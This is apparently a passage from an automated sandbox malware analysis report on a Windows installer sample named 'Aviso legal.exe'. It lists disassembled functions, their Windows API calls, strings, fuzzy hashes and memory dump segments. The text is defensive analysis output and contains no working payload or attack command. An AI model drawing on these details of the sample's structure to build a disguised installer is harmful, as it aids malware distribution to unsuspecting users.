Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45

Function 0040755C Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95

Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

N, xrefs: 0040519B
M, xrefs: 004050BA
, xrefs: 004054D4

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

Call, xrefs: 00404835
N, xrefs: 004047F4

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

%ls=%ls, xrefs: 004061F8
[Rename], xrefs: 0040626C, 0040627E

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
Opcode Fuzzy Hash: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75E03420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
CharNextW.USER32(?,00000000,75E03420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
CharPrevW.USER32(?,?,75E03420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004067C5
*?|<>/":, xrefs: 00406816

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2977677972
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(000CC1EB,00000064,000CD618), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
